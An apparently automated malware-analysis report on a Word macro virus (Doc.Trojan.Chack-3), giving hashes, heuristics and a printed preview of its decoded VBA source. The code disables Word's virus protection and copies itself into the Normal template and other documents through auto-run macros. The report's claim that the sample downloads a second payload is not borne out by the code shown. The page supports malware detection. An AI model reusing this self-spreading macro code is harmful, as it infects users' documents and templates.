Office (OLE) malware analysis — malicious · 7429500e5becc6b3

MALICIOUS

Office (OLE)

55.0 KB Created: 1999-10-18 10:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c2053e1a3a8470152b98bf1b0a94b37b SHA-1: 1f60c2147c51edf6781a7f50f8fe2acc6fa26c9c SHA-256: 7429500e5becc6b34441a905fc356206badef02597054ff27e47d9afe4d7e18c

340 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, flagged by multiple high-severity heuristics including OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC. The AutoOpen macro is present and configured to execute a shell command. The script itself contains obfuscated code and a contact email address, 'SuperXtar@Usa.Net', suggesting it is designed to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Chack-3' further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Trojan.Chack-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Chack-3
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24438 bytes
SHA-256: `cf6b91cc948d55e47eaf945ba66fa673c8219d003a66f73fd00f5219b1ae9517`
Detection ClamAV: Doc.Trojan.Chack-3 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Jiuster" 'No Modifique Nada Causaras Errores Att. Jiuster SuperXtar@Usa.Net 'Si Quieres Aprender Contactame Via E.Mail 'Abstenerse Lamer's como tu Public Jiustea1 Public Jiustea Public Jiustez Sub Seli() Jiustex = Application.DisplayAlerts Application.DisplayAlerts = wdAlertsNone Call Idat WordBasic.DisableAutoMacros 0 CommandBars("Visual Basic").Visible = False CommandBars("Visual Basic").Enabled = False CommandBars("Visual Basic").Protection = msoBarNoChangeVisible CommandBars("Visual Basic").Protection = msoBarNoCustomize On Error GoTo 0 End Sub Sub HolaIDAT() Application.DisplayAlerts = Jiustex End Sub Sub Experto() On Error GoTo Jiu2 Jiustea1 = 0 Jiustez = False Set Ad = ActiveDocument Set NT = NormalTemplate If Jiustez = False Then On Error GoTo Jit2 Application.OrganizerCopy Source:=NT.FullName, _ Destination:=Ad.FullName, Name:= _ "Jiuster", Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=NT.FullName, _ Destination:=Ad.FullName, Name:= _ "Jiuster4", Object:=wdOrganizerObjectProjectItems Jiustea1 = 1 Jit2: End If Jiu2: End Sub Sub JiusterSoft() Call Idat On Error GoTo Jiu1 Jiustea = False Set Ad = ActiveDocument Set NT = NormalTemplate On Error GoTo Jit1a For i = 1 To NT.VBProject.VBComponents.Count NMacr = NT.VBProject.VBComponents(i).Name Next i Jit1a: If Jiustea = False Then On Error GoTo Jit1 Application.OrganizerCopy Source:=Ad.FullName, _ Destination:=NT.FullName, Name:= _ "Jiuster", Object:=wdOrganizerObjectProjectItems Application.OrganizerCopy Source:=Ad.FullName, _ Destination:=NT.FullName, Name:= _ "Jiuster4", Object:=wdOrganizerObjectProjectItems Templates(NT.FullName).Save Jit1: End If Jiu1: End Sub Sub LOMAXIMO() Call Seli Call JiusterSoft Call HolaIDAT End Sub Sub Idat() With Options .VirusProtection = False .SaveNormalPrompt = False End With End Sub Sub Hacker() On Error GoTo Jit4 Set Ad = ActiveDocument If Jiustea1 = 1 Then Ad.SaveAs FileName:=Ad.Name, FileFormat:=wdFormatDocument End If Jit4: End Sub Sub AutoOpen() Call LOMAXIMO End Sub Sub AutoClose() Call Seli Call JiusterSoft Call Experto Call HolaIDAT ActiveDocument.SaveAs Call LOMAXIMO End Sub Sub FileClose() Call Seli Call JiusterSoft Call Experto Call HolaIDAT ActiveDocument.SaveAs Call LOMAXIMO End Sub Sub FileOpen() Call LOMAXIMO Dialogs(wdDialogFileOpen).Show Call Seli Call Experto Call Hacker Call HolaIDAT End Sub Sub FileSaveAs() Call Seli Call JiusterSoft Call Experto Call HolaIDAT Dialogs(wdDialogFileSaveAs).Show End Sub Sub HelpAbout() On Error GoTo Jiu3 Jiuster4.Show Jiu3: Call LOMAXIMO End Sub Sub HerramMacro() On Error GoTo Jiu3 Jiuster4.Show Application.OnTime Now + TimeValue("00:30:00"), "JiusVisual" Jiu3: Call LOMAXIMO End Sub Sub FileExit() Call Seli Call JiusterSoft Call Experto On Error GoTo Jiu4 If WeekDay(Date) = 5 Then Jiuster4.Show Jiu4: Call HolaIDAT WordBasic.FileExit End Sub Sub ToolsOptions() Dialogs(wdDialogToolsOptions).Show Call LOMAXIMO End Sub Sub FileNew() Call LOMAXIMO Dialogs(wdDialogFileNew).Show End Sub Sub FileTemplates() On Error Resume Next Call LOMAXIMO End Sub Sub ToolsCustomize() On Error Resume Next ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.